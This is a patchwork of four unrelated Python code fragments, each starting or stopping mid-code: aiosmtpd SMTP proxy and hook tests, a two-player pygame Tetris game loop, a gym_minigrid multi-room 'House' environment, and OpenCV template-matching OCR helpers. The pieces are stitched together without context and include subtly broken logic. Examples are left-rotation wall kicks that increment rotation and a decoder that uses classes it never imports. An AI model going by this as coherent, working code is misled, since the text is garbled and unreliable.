# differently for each different test, the controller of the proxy is
# created in the individual tests, not in the setup.
self.upstream = DataHandler()
upstream_controller = Controller(self.upstream, port=9025)
upstream_controller.start()
self.addCleanup(upstream_controller.stop)
self.proxy = Proxy(upstream_controller.hostname, 9025)
self.source = """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Testing
"""
# The upstream SMTPd will always receive the content as bytes
# delimited with CRLF.
self.expected = CRLF.join([
'From: <NAME> <<EMAIL>>',
'To: <NAME> <<EMAIL>>',
'Subject: A test',
'X-Peer: ::1',
'',
'Testing\r\n']).encode('ascii')
def test_deliver_bytes(self):
with ExitStack() as resources:
controller = Controller(self.proxy, port=9024)
controller.start()
resources.callback(controller.stop)
client = resources.enter_context(
SMTP(*(controller.hostname, controller.port)))
client.sendmail(
'<EMAIL>', ['<EMAIL>'], self.source)
client.quit()
self.assertEqual(self.upstream.content, self.expected)
self.assertEqual(self.upstream.original_content, self.expected)
def test_deliver_str(self):
with ExitStack() as resources:
controller = DecodingController(self.proxy, port=9024)
controller.start()
resources.callback(controller.stop)
client = resources.enter_context(
SMTP(*(controller.hostname, controller.port)))
client.sendmail(
'<EMAIL>', ['<EMAIL>'], self.source)
client.quit()
self.assertEqual(self.upstream.content, self.expected)
self.assertEqual(self.upstream.original_content, self.expected)
class TestProxyMocked(unittest.TestCase):
def setUp(self):
handler = Proxy('localhost', 9025)
controller = DecodingController(handler)
controller.start()
self.addCleanup(controller.stop)
self.address = (controller.hostname, controller.port)
self.source = """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Testing
"""
def test_recipients_refused(self):
with ExitStack() as resources:
log_mock = resources.enter_context(patch('aiosmtpd.handlers.log'))
mock = resources.enter_context(
patch('aiosmtpd.handlers.smtplib.SMTP'))
mock().sendmail.side_effect = SMTPRecipientsRefused({
'<EMAIL>': (500, 'Bad Bart'),
})
client = resources.enter_context(SMTP(*self.address))
client.sendmail(
'<EMAIL>', ['<EMAIL>'], self.source)
client.quit()
# The log contains information about what happened in the proxy.
self.assertEqual(
log_mock.info.call_args_list, [
call('got SMTPRecipientsRefused'),
call('we got some refusals: %s',
{'<EMAIL>': (500, 'Bad Bart')})]
)
def test_oserror(self):
with ExitStack() as resources:
log_mock = resources.enter_context(patch('aiosmtpd.handlers.log'))
mock = resources.enter_context(
patch('aiosmtpd.handlers.smtplib.SMTP'))
mock().sendmail.side_effect = OSError
client = resources.enter_context(SMTP(*self.address))
client.sendmail(
'<EMAIL>', ['<EMAIL>'], self.source)
client.quit()
# The log contains information about what happened in the proxy.
self.assertEqual(
log_mock.info.call_args_list, [
call('we got some refusals: %s',
{'<EMAIL>': (-1, 'ignore')}),
]
)
class HELOHandler:
async def handle_HELO(self, server, session, envelope, hostname):
return '250 geddy.example.com'
class EHLOHandler:
async def handle_EHLO(self, server, session, envelope, hostname):
return '250 alex.example.com'
class MAILHandler:
async def handle_MAIL(self, server, session, envelope, address, options):
envelope.mail_options.extend(options)
return '250 Yeah, sure'
class RCPTHandler:
async def handle_RCPT(self, server, session, envelope, address, options):
envelope.rcpt_options.extend(options)
if address == '<EMAIL>':
return '550 Rejected'
envelope.rcpt_tos.append(address)
return '250 OK'
class DATAHandler:
async def handle_DATA(self, server, session, envelope):
return '599 Not today'
class AUTHHandler:
async def handle_AUTH(self, server, session, envelope, args):
server.authenticates = True
return '235 Authentication successful'
class NoHooksHandler:
pass
class TestHooks(unittest.TestCase):
def test_rcpt_hook(self):
controller = Controller(RCPTHandler())
controller.start()
self.addCleanup(controller.stop)
with SMTP(controller.hostname, controller.port) as client:
with self.assertRaises(SMTPRecipientsRefused) as cm:
client.sendmail('<EMAIL>', ['<EMAIL>'], """\
From: <EMAIL>
To: <EMAIL>
Subject: Test
""")
self.assertEqual(cm.exception.recipients, {
'<EMAIL>': (550, b'Rejected'),
})
def test_helo_hook(self):
controller = Controller(HELOHandler())
controller.start()
self.addCleanup(controller.stop)
with SMTP(controller.hostname, controller.port) as client:
code, response = client.helo('me')
self.assertEqual(code, 250)
self.assertEqual(response, b'geddy.example.com')
def test_ehlo_hook(self):
controller = Controller(EHLOHandler())
controller.start()
self.addCleanup(controller.stop)
with SMTP(controller.hostname, controller.port) as client:
code, response = client.ehlo('me')
self.assertEqual(code, 250)
lines = response.decode('utf-8').splitlines()
self.assertEqual(lines[-1], 'alex.<EMAIL>')
def test_mail_hook(self):
controller = Controller(MAILHandler())
controller.start()
self.addCleanup(controller.stop)
with SMTP(controller.hostname, controller.port) as client:
client.helo('me')
code, | |
mino, rotation):
dy += 1
# Create new mino
else:
if hard_drop or bottom_count == 6:
hard_drop = False
bottom_count = 0
score += 10 * level
draw_mino(dx, dy, mino, rotation)
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
if is_stackable(next_mino):
mino = next_mino
next_mino = randint(1, 7)
dx, dy = 3, 0
rotation = 0
hold = False
else: #더이상 쌓을 수 없으면 게임오버
ui_variables.GameOver_sound.play()
start = False
game_over = True
pygame.time.set_timer(pygame.USEREVENT, 1)
else:
bottom_count += 1
# Move mino down
if not is_bottom_2P(dx_2P, dy_2P, mino_2P, rotation_2P):
dy_2P += 1
# Create new mino
else:
if hard_drop_2P or bottom_count_2P == 6:
hard_drop_2P = False
bottom_count_2P = 0
score += 10 * level
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_mino(dx, dy, mino, rotation)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
if is_stackable_2P(next_mino_2P):
mino_2P = next_mino_2P
next_mino_2P = randint(1, 7)
dx_2P, dy_2P = 3, 0
rotation_2P = 0
hold_2P = False
else: #더이상 쌓을 수 없으면 게임오버
ui_variables.GameOver_sound.play()
start = False
game_over = True
pygame.time.set_timer(pygame.USEREVENT, 1)
else:
bottom_count_2P += 1
# Erase line
# 콤보 카운트
erase_count = 0
erase_count_2P = 0
combo_value = 0
sent = 0
for j in range(21):
is_full = True
for i in range(10):
if matrix[i][j] == 0:
is_full = False
if is_full:
erase_count += 1
k = j
combo_value += 1
while k > 0:
for i in range(10):
matrix[i][k] = matrix[i][k - 1]
k -= 1
for j in range(21):
is_full = True
for i in range(10):
if matrix_2P[i][j] == 0:
is_full = False
if is_full:
erase_count_2P += 1
k = j
combo_value += 1
while k > 0:
for i in range(10):
matrix_2P[i][k] = matrix_2P[i][k - 1]
k -= 1
# 지운 블록이 없으면 콤보 -1
#if erase_count == 0 :
#combo_count -= 1
#if combo_count < 0:
#combo_count = 0
if erase_count >= 1:
combo_count += 1
if erase_count == 1:
ui_variables.break_sound.play()
ui_variables.single_sound.play()
score += 50 * level * erase_count + combo_count
sent += 1
elif erase_count == 2:
ui_variables.break_sound.play()
ui_variables.double_sound.play()
ui_variables.double_sound.play()
score += 150 * level * erase_count + 2 * combo_count
sent += 2
elif erase_count == 3:
ui_variables.break_sound.play()
ui_variables.triple_sound.play()
ui_variables.triple_sound.play()
ui_variables.triple_sound.play()
score += 350 * level * erase_count + 3 * combo_count
sent += 3
elif erase_count == 4:
ui_variables.break_sound.play()
ui_variables.tetris_sound.play()
ui_variables.tetris_sound.play()
ui_variables.tetris_sound.play()
ui_variables.tetris_sound.play()
score += 1000 * level * erase_count + 4 * combo_count
screen.blit(ui_variables.combo_4ring, (250, 160))
sent += 4
for i in range(1, 11) :
if combo_count == i : # 1 ~ 10 콤보 이미지
screen.blit(ui_variables.large_combos[i-1], (124, 190)) # blits the combo number
elif combo_count > 10 : # 11 이상 콤보 이미지
screen.blit(tetris4, (100, 190)) # blits the combo number
for i in range(1, 10) :
if combo_count == i+2 : # 3 ~ 11 콤보 사운드
ui_variables.combos_sound[i-1].play()
sent = checkCombo(combo_count, sent) # 콤보 증가
# Increase level
goal -= erase_count
if goal < 1 and level < 15:
level += 1
ui_variables.LevelUp_sound.play()
ui_variables.LevelUp_sound.play()
ui_variables.LevelUp_sound.play()
ui_variables.LevelUp_sound.play()
goal += level * 5
framerate = int(framerate * 0.8)
elif event.type == KEYUP: ##중요
erase_mino(dx, dy, mino, rotation)
erase_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
if event.key == K_ESCAPE:
ui_variables.click_sound.play()
start = False
pause = True
# Hard drop
elif event.key == K_SPACE:
ui_variables.fall_sound.play()
ui_variables.drop_sound.play()
while not is_bottom(dx, dy, mino, rotation):
dy += 1
hard_drop = True
pygame.time.set_timer(pygame.USEREVENT, 1)
draw_mino(dx, dy, mino, rotation)
draw_mino_2P(dx_2P,dy_2P,mino_2P,rotation_2P)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
elif event.key == K_f:
ui_variables.fall_sound.play()
ui_variables.drop_sound.play()
while not is_bottom_2P(dx_2P, dy_2P, mino_2P, rotation_2P):
dy_2P += 1
hard_drop_2P = True
pygame.time.set_timer(pygame.USEREVENT, 1)
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_mino(dx, dy, mino, rotation)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
# Hold
elif event.key == K_LSHIFT :
if hold == False:
ui_variables.move_sound.play()
if hold_mino == -1:
hold_mino = mino
mino = next_mino
next_mino = randint(1, 7)
else:
hold_mino, mino = mino, hold_mino
dx, dy = 3, 0
rotation = 0
hold = True
draw_mino(dx, dy, mino, rotation)
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
elif event.key == K_c :
if hold_2P == False:
ui_variables.move_sound.play()
if hold_mino_2P == -1:
hold_mino_2P = mino_2P
mino_2P = next_mino_2P
next_mino_2P = randint(1, 7)
else:
hold_mino_2P, mino_2P = mino_2P, hold_mino_2P
dx_2P, dy_2P = 3, 0
rotation_2P = 0
hold_2P = True
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_mino(dx, dy, mino, rotation)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
# Turn right
elif event.key == K_UP :
if is_turnable_r(dx, dy, mino, rotation):
ui_variables.move_sound.play()
rotation += 1
# Kick
elif is_turnable_r(dx, dy - 1, mino, rotation):
ui_variables.move_sound.play()
dy -= 1
rotation += 1
elif is_turnable_r(dx + 1, dy, mino, rotation):
ui_variables.move_sound.play()
dx += 1
rotation += 1
elif is_turnable_r(dx - 1, dy, mino, rotation):
ui_variables.move_sound.play()
dx -= 1
rotation += 1
elif is_turnable_r(dx, dy - 2, mino, rotation):
ui_variables.move_sound.play()
dy -= 2
rotation += 1
elif is_turnable_r(dx + 2, dy, mino, rotation):
ui_variables.move_sound.play()
dx += 2
rotation += 1
elif is_turnable_r(dx - 2, dy, mino, rotation):
ui_variables.move_sound.play()
dx -= 2
rotation += 1
if rotation == 4:
rotation = 0
draw_mino(dx, dy, mino, rotation)
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
elif event.key == K_x:
if is_turnable_r(dx_2P, dy_2P, mino_2P, rotation_2P):
ui_variables.move_sound.play()
rotation_2P += 1
# Kick
elif is_turnable_r(dx_2P, dy_2P - 1, mino_2P, rotation_2P):
ui_variables.move_sound.play()
dy_2P -= 1
rotation_2P += 1
elif is_turnable_r(dx_2P + 1, dy_2P, mino_2P, rotation_2P):
ui_variables.move_sound.play()
dx_2P += 1
rotation_2P += 1
elif is_turnable_r(dx_2P - 1, dy_2P, mino_2P, rotation_2P):
ui_variables.move_sound.play()
dx_2P -= 1
rotation_2P += 1
elif is_turnable_r(dx_2P, dy_2P - 2, mino_2P, rotation_2P):
ui_variables.move_sound.play()
dy_2P -= 2
rotation_2P += 1
elif is_turnable_r(dx_2P + 2, dy_2P, mino_2P, rotation_2P):
ui_variables.move_sound.play()
dx_2P += 2
rotation_2P += 1
elif is_turnable_r(dx_2P - 2, dy_2P, mino_2P, rotation_2P):
ui_variables.move_sound.play()
dx_2P -= 2
rotation_2P += 1
if rotation_2P == 4:
rotation_2P = 0
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_mino(dx, dy, mino, rotation)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
# Turn left
elif event.key == K_z or event.key == K_LCTRL:
if is_turnable_l(dx, dy, mino, rotation):
ui_variables.move_sound.play()
rotation -= 1
# Kick
elif is_turnable_l(dx, dy - 1, mino, rotation):
ui_variables.move_sound.play()
dy -= 1
rotation -= 1
elif is_turnable_l(dx + 1, dy, mino, rotation):
ui_variables.move_sound.play()
dx += 1
rotation -= 1
elif is_turnable_l(dx - 1, dy, mino, rotation):
ui_variables.move_sound.play()
dx -= 1
rotation -= 1
elif is_turnable_l(dx, dy - 2, mino, rotation):
ui_variables.move_sound.play()
dy -= 2
rotation += 1
elif is_turnable_l(dx + 2, dy, mino, rotation):
ui_variables.move_sound.play()
dx += 2
rotation += 1
elif is_turnable_l(dx - 2, dy, mino, rotation):
ui_variables.move_sound.play()
dx -= 2
if rotation == -1:
rotation = 3
draw_mino(dx, dy, mino, rotation)
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
# Move left
elif event.key == K_LEFT: # key = pygame.key.get_pressed()
if not is_leftedge(dx, dy, mino, rotation):
ui_variables.move_sound.play()
keys_pressed = pygame.key.get_pressed()
pygame.time.set_timer(pygame.KEYUP, framerate * 3)
dx -= 1
draw_mino(dx, dy, mino, rotation)
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
# Move right
elif event.key == K_RIGHT: # keys_pressed[K_RIGHT] :
if not is_rightedge(dx, dy, mino, rotation):
ui_variables.move_sound.play()
keys_pressed = pygame.key.get_pressed()
pygame.time.set_timer(pygame.KEYUP, framerate * 3)
dx += 1
draw_mino(dx, dy, mino, rotation)
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
elif event.key == K_a : # key = pygame.key.get_pressed()
if not is_leftedge_2P(dx_2P, dy_2P, mino_2P, rotation_2P):
ui_variables.move_sound.play()
keys_pressed = pygame.key.get_pressed()
pygame.time.set_timer(pygame.KEYUP, framerate * 3)
dx_2P -= 1
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_mino(dx, dy, mino, rotation)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
# Move right
elif event.key == K_d :
if not is_rightedge_2P(dx_2P, dy_2P, mino_2P, rotation_2P):
ui_variables.move_sound.play()
keys_pressed = pygame.key.get_pressed()
pygame.time.set_timer(pygame.KEYUP, framerate * 3)
dx_2P += 1
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_mino(dx, dy, mino, rotation)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
#elif unpressed(pygame.K_LEFT) :
# movement_keys_timer = movement_keys_speed * 2
#elif unpressed(pygame.K_RIGHT) :
# movement_keys_timer = movement_keys_speed * 2
if any(movement_keys.values()):
movement_keys_timer += clock.tick(50)
#if movement_keys_timer > movement_keys_speed:
# pressed(pygame.K_LEFT)
# pressed(pygame.K_RIGHT)
# movement_keys_timer %= movement_keys_speed
pygame.display.update()
# Game over screen
elif game_over:
for event in pygame.event.get():
if event.type == QUIT:
done = True
elif event.type == USEREVENT:
pygame.mixer.music.stop()
pygame.time.set_timer(pygame.USEREVENT, 300)
over_text_1 = ui_variables.h2_b.render("GAME", 1, ui_variables.red)
over_text_2 = ui_variables.h2_b.render("OVER", 1, ui_variables.red)
over_start = ui_variables.h5.render("Press return to continue", 1, ui_variables.black)
draw_board(next_mino, hold_mino, score, level, goal)
screen.blit(over_text_1, (130, 250))
screen.blit(over_text_2, (135, 290))
name_1 = ui_variables.h2_i.render(chr(name[0]), 1, ui_variables.black)
name_2 = ui_variables.h2_i.render(chr(name[1]), 1, ui_variables.black)
name_3 = ui_variables.h2_i.render(chr(name[2]), 1, ui_variables.black)
underbar_1 = ui_variables.h2.render("_", 1, ui_variables.black)
underbar_2 = ui_variables.h2.render("_", 1, ui_variables.black)
underbar_3 = ui_variables.h2.render("_", 1, | |
"""
House Environment and related utilities.
"""
from gym_minigrid.minigrid import Grid, MiniGridEnv, Floor, Door, Wall, Goal
from gym_minigrid.minigrid import OBJECT_TO_IDX, IDX_TO_OBJECT, IDX_TO_COLOR
from gym_minigrid.register import register
from enum import IntEnum
import random
import numpy as np
import networkx as nx
import matplotlib.pyplot as plt
CELL_PIXELS = 32
class House(Grid):
"""
Creates whole house environment from underlying lattice graph, adding doors, objects, rewards, obstacles, etc.
"""
# TODO property and setters/getters to hide cumbersome checks
# Room sizes
MAX_ROOM_WIDTH = 8
MAX_ROOM_HEIGHT = 8
MIN_ROOM_WIDTH = 3
MIN_ROOM_HEIGHT = 3
def __init__(self, lattice, room_w=None, room_h=None, obstacles=True, doors_open=True, verbose=False):
"""
Create house from lattice graph.
@param lattice: Lattice instance.
@param room_w, room_h: Positive integers. Room width and height. Random if not provided.
@param obstacles: Boolean. If True, put an obstacle (lava) in every room.
@param doors_open: Boolean. If True, all doors are open. Defaults to True.
@param verbose: Boolean. If True, print stuff while building house. Mostly for debugging.
"""
self.lattice = lattice
self.dim = lattice.dim
# TODO we'll consider non-square rooms in the future
assert room_h == room_w
if room_w is None:
room_w = random.choice(range(self.MIN_ROOM_WIDTH, self.MAX_ROOM_WIDTH+1))
room_h = random.choice(range(self.MIN_ROOM_HEIGHT, self.MAX_ROOM_HEIGHT+1))
assert House.MIN_ROOM_WIDTH <= room_w <= House.MAX_ROOM_WIDTH
self.room_w = room_w
assert House.MIN_ROOM_HEIGHT <= room_w <= House.MAX_ROOM_HEIGHT
self.room_h = room_h
width = self.dim[0] * (self.room_w+self.dim[0] + 1) + 1
height = self.dim[1] * (self.room_h+self.dim[1] + 1) + 1
# TODO fine-grained control of obstacles instead of single boolean
# We could try to handle, from less to more random:
# - dict with exact obstacle coords
# - list of rooms & # of obstacles in each
# - prob of obstacle per room
# - whether to put obstacles or not - current implementation
self.obstacles = obstacles
self.doors_open = doors_open
self.verbose = verbose
if self.verbose:
print('There are {}-by-{} rooms'.format(*self.dim))
print('Each room has {}-by-{} tiles'.format(self.room_w, self.room_h))
print('Whole house has {}-by-{} tiles'.format(width, height))
super().__init__(width=width, height=height)
self.shape = self.width, self.height
self._set_floor()
self._build_outer_walls()
self._build_inner_walls()
self._add_reward()
self._add_obstacles()
# NOTE: None tiles are reserved for the agent - see self.encode
assert all([tile is not None for tile in self.grid])
def plot(self, ax=None, agent_plot=None):
"""Diagnostic plot."""
if ax is None:
dims = (1,2) if self.width >= self.height else (2,1)
fig, ax = plt.subplots(1,2)
img = self.encode()
if agent_plot is not None:
i, j, v = agent_plot
img[i, j, 0] = v
self.lattice.plot(ax=ax[0])
ax[1].imshow(img[:,:,0]) #.T, origin='lower')
ax[0].set_xticks([])
ax[0].set_yticks([])
ax[1].set_xticks([])
ax[1].set_yticks([])
return ax
@staticmethod
def decode(array):
"""
Decode an array grid encoding back into a grid
"""
width, height, channels = array.shape
assert channels == 3
grid = Grid(width, height)
for i in range(width):
for j in range(height):
typeIdx, colorIdx, state = array[i, j]
if typeIdx == OBJECT_TO_IDX['unseen'] or \
typeIdx == OBJECT_TO_IDX['empty']:
continue
objType = IDX_TO_OBJECT[typeIdx]
color = IDX_TO_COLOR[colorIdx]
# State, 0: open, 1: closed, 2: locked
is_open = state == 0
is_locked = state == 2
if objType == 'wall':
v = Wall(color)
elif objType == 'floor':
v = Floor(color)
elif objType == 'ball':
v = Ball(color)
elif objType == 'key':
v = Key(color)
elif objType == 'box':
v = Box(color)
elif objType == 'door':
v = Door(color, is_open, is_locked)
elif objType == 'goal':
v = Goal()
elif objType == 'lava':
v = Lava()
elif objType == 'agent':
v = None
else:
assert False, "unknown obj type in decode '%s'" % objType
grid.set(i, j, v)
return grid
def _set_floor(self):
"""Cover entire grid with floor tiles."""
[self.set(i, j, Floor()) for i in range(self.width) for j in range(self.height)]
def _build_outer_walls(self):
"""Build surrounding walls."""
self.horz_wall(0, 0)
self.horz_wall(0, self.height-1)
self.vert_wall(0, 0)
self.vert_wall(self.width-1, 0)
def _build_inner_walls(self):
"""Build walls between rooms, doors included."""
# Loop over rooms
for (i,j) in self.lattice.nodes:
#if i==self.dim[0] or j==self.dim[1]: # discard rightmost and top nodes
# continue
xL = i * self.room_w + i
yT = j * self.room_h + j
xR = xL + self.room_w + 1
yB = yT + self.room_h + 1
# Right vertical wall
if self.verbose: print('Adding vertical wall of height {} at ({}, {})'.format(self.room_h, xR, yB))
self.vert_wall(xR, yT, self.room_h+1)
# Bottom horizontal wall
if self.verbose: print('Adding horizontal wall of width {} at ({}, {})'.format(self.room_w, xL, yT))
self.horz_wall(xL, yB, self.room_w+1)
# Add doors if needed
doors = []
if ((i,j),(i+1,j)) in self.lattice.edges:
coords=(xR, random.choice(range(yT+1, yB)))
self._add_door(coords)
doors += coords
if ((i,j),(i,j+1)) in self.lattice.edges:
coords=(random.choice(range(xL+1, xR)), yB)
self._add_door(coords)
doors += coords
#Construct list of rooms. Format ((i,j),room_w, room_h, list_of_doors to the right and up)
#rooms += ((i,j), room_w, room_h, doors)
def _add_door(self, coords):
"""Add door at coords = (x,y)"""
x, y = coords
assert isinstance(self.get(x,y), Wall), 'You can\'t put a door outside of a wall!'
self.set(x, y, Door(color='purple', is_open=self.doors_open, is_locked=False))
def _add_reward(self):
"""Add reward in final room."""
i, j = self.lattice.end
xL = i * self.room_w + i
yB = j * self.room_h + j
xR = xL + self.room_w + 1
yT = yB + self.room_h + 1
if self.verbose:
print('Adding reward in room ({},{})'.format(i,j))
print('Choosing tile in square [{},{}] X [{},{}]'.format(xL+2, xR, yB+2, yT))
x = random.choice(range(xL+2, xR-1))
y = random.choice(range(yB+2, yT-1))
self.set(x, y, Goal())
# TODO how does this get converted to reward?
def _add_obstacles(self):
pass
# TODO add obstacles
# TODO other objects?
class Lattice:
"""
Connected subgraph of a lattice graph.
"""
# Max lattice size
MIN_DIM = 2 # 2-by-2
MAX_DIM = 5 # 5-by-5
# Node colors
BASE_COLOR = 'gray'
START_COLOR = 'black'
END_COLOR = 'green'
def __init__(self, dim=None, edges=None, start=None, end=None):
"""
Create graph.
@param dim: Array with lattice dimensions e.g. a 2-by-3 grid should have dim = [2,3].
@param edges: Array or set of edges as coordinate pairs. Random if not given.
"""
# Create base graph containing all edges in lattice
if dim is None:
x = random.choice(range(self.MIN_DIM, self.MAX_DIM+1))
y = random.choice(range(self.MIN_DIM, self.MAX_DIM+1))
dim = [x,y]
self.dim = dim
# I have to permute dim here because graphs are defined as [m_rows, n_cols] but I want to do [x, y]
self._base_graph = nx.grid_graph(dim=[self.dim[1], self.dim[0]])
# Select subgraph either from edges variable or randomly
if edges is not None:
self._graph = nx.Graph()
self._graph.add_nodes_from(self._base_graph.nodes)
self._graph.add_edges_from(edges)
assert nx.is_connected(self._graph), 'Wrong edges: the graph should be connected!'
else:
self._graph = get_random_connected_subgraph(self._base_graph)
# Generate start and end if not given and make sure they're not the same node
if start and end:
assert start!=end, 'Start and end nodes should be different!'
if start is None:
start = random.choice([node for node in list(self._graph.nodes) if node!=end])
if end is None:
end = random.choice([node for node in list(self._graph.nodes) if node!=start])
self.start = start
self.end = end
# Color graph according to start/end
self._colors = {n: self.BASE_COLOR for n in self._graph.nodes}
self._colors[self.start] = self.START_COLOR
self._colors[self.end] = self.END_COLOR
nx.set_node_attributes(self._graph, self._colors, 'color')
# Make these visible
self.nodes = self._graph.nodes
self.edges = self._graph.edges
def shortest_path(self):
"""Shortest path between start and end."""
return nx.shortest_path(self._graph, self.start, self.end)
def plot(self, ax=None, node_kwds={'s': 100}, edge_kwds={'color': 'gray'}):
# TODO nodes (not edges) should be overlaid at the forefront
if ax is None:
fig, ax = plt.subplots()
[ax.plot(*zip(*edge), **edge_kwds) for edge in self._graph.edges]
[ax.scatter(*node, color=self._graph.nodes[node]['color'], **node_kwds) for node in self._graph.nodes]
ax.invert_yaxis()
return ax
class HouseEnv(MiniGridEnv):
"""
House environment for IDA
"""
MAX_GRID_SIZE = Lattice.MAX_DIM*(max(House.MAX_ROOM_HEIGHT+1, House.MAX_ROOM_HEIGHT)+1)+1
def __init__(
self,
dim = None, # Lattice params
edges = None,
start = None,
end = None,
room_w = None, # House params
room_h = None,
obstacles = False,
doors_open = True,
verbose = False,
padding = True,
size = None, # Total grid size - only when padding
pos_in_room = None, # Agent position w/in start room
agent_dir = None, # Agent direction in 0 to 3
):
# Generate lattice
# TODO these should be dynamically updated after lattice created
self.dim = dim
self.edges = edges
self.start = start
self.end = end
self.lattice = Lattice(dim=self.dim, edges=self.edges, start=self.start, end=self.end)
# Create the grid
self.room_w = room_w
self.room_h = room_h
self.obstacles = obstacles
self.doors_open = doors_open
self.grid = House(
lattice = self.lattice,
room_w = self.room_w,
room_h = self.room_h,
)
self.width = self.grid.width
| |
iterate this section for efficiency
same_parts, different_parts = self.image_difference(threshold, needle_directory, needle_section[4], haystack_directory, haystack_section[4], remaining_iterations)
similarities.append(same_parts)
differences.append(different_parts)
else:
print("There are no matches.")
return similarities, differences
def character_concat(self, threshold, multiboxes, matches):
# Concat data together to form usable words
match_len = len(matches)
temp_array = matches[0]
result_array = []
if multiboxes:
skip_next = False
for index in range(1, match_len):
if abs(matches[index-1][1] - matches[index][1]) < threshold:
print(temp_array)
# Sum width of each character
temp_array[2] = temp_array[2] + (matches[index][0]-matches[index-1][0])
# Add character to the end
if multiboxes:
if not skip_next:
temp_array[4] = temp_array[4] + matches[index][4]
else:
skip_next = False
else:
temp_array[4] = temp_array[4] + matches[index][4]
print(temp_array)
if index < match_len-1 and abs((matches[index][0]+matches[index][2]) - matches[index+1][0]) > threshold and len(temp_array[4]) > 1:
if multiboxes:
skip_next = True
temp_array[2] = matches[index][2] + matches[index][0] - temp_array[0]
result_array.append(temp_array)
temp_array = matches[index+1]
index += 2
else:
temp_array[4] = temp_array[4] + ' '
if index == match_len - 1 and len(temp_array[4]) > 1:
result_array.append(temp_array)
temp_array = matches[index]
elif len(temp_array[4]) > 1:
result_array.append(temp_array)
temp_array = matches[index]
# Clean up results
print(result_array[0][4])
result_len = len(result_array)
for index in range(0, result_len-2):
if multiboxes:
temp_str = result_array[index][4]
result_array[index][4] = temp_str.replace("o8", "8").replace("co", "c").replace("og", "g")
if index > 0 and result_array[index][4] == 'rg':
result_array.pop(index)
result_array[index-1][4] = result_array[index-1][4] + 'g'
if result_array[index][4] == 'lng':
result_array.pop(index)
result_array[index-1][4] = result_array[index-1][4] + 'ng'
elif not multiboxes:
result_array[index][4] = result_array[index][4].replace("n r g", "ng").replace("c o", "c").replace("i l", "i").replace("n r ", "n")
return result_array
def proximity_combine(self, list_a, list_b):
# Combine elements in lists to form combinations
list_a_len = len(list_a)
list_b_len = len(list_b)
combined_list = []
for index_a in range(0, list_a_len):
for index_b in range(0, list_b_len):
distance_x = abs(list_a[index_a][0] - list_b[index_b][0])
distance_y = abs(list_a[index_a][1] - list_b[index_b][1])
# Finds smallest width
padding = (min(list_a[index_a][2], list_b[index_b][2]))*2
if distance_x < padding and distance_y < padding:
if list_a[index_a][0] < list_b[index_b][0]:
combined_str = str(list_a[index_a][4])+str(list_b[index_b][4])
new_x = list_a[index_a][0]
new_y = list_a[index_a][1]
else:
combined_str = str(list_b[index_b][4]) + str(list_a[index_a][4])
new_x = list_a[index_b][0]
new_y = list_a[index_b][1]
if combined_str not in combined_list:
combined_width = list_a[index_a][2]+list_b[index_b][2]
new_height = list_a[index_a][3]
combined_list.append([new_x, new_y, combined_width, new_height, combined_str])
return combined_list
def character_search(self, threshold, letters, haystack_filename):
# Keep track of all matches and identify unique cases
chars = []
chars_list = []
if letters:
chars_list = ['A', 'B', 'C', 'D', 'E',
'F', 'G', 'H', 'I', 'J',
'K', 'L', 'M', 'N', 'O',
'P', 'Q', 'R', 'S', 'T',
'U', 'V', 'W', 'X', 'Y',
'Z', '0', '1', '2', '3',
'4', '5', '6', '7', '8',
'9']
else:
chars_list = ['!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '_', '-', '+', '=']
chars_list_len = len(chars_list)
if os.path.exists(self.character_directory):
files = os.listdir(self.character_directory)
self.image_index = 1
haystack = cv2.imread(self.imagedir + haystack_filename, cv2.IMREAD_UNCHANGED)
grayscale_haystack = cv2.cvtColor(haystack, cv2.COLOR_BGR2GRAY)
match_number = 0
while match_number < chars_list_len:
for f in files:
if '.png' in f:
matches = []
image_path = os.path.join(self.character_directory,
chars_list[match_number] + '_' + str(self.image_index) + '.png')
print(image_path)
if not os.path.exists(image_path):
break
needle = cv2.imread(image_path, cv2.IMREAD_UNCHANGED)
grayscale_needle = cv2.cvtColor(needle, cv2.COLOR_BGR2GRAY)
result = cv2.matchTemplate(grayscale_haystack, grayscale_needle, cv2.TM_CCOEFF_NORMED)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
# Max location has the best match with max_val to be % accuracy
width = needle.shape[1]
height = needle.shape[0]
bottom_right = (max_loc[0] + width, max_loc[1] + height)
# Threshold is the % accuracy compared to original needle
yloc, xloc = np.where(result >= threshold)
if len(xloc) > 0:
print("There are {0} total matches in the haystack.".format(len(xloc)))
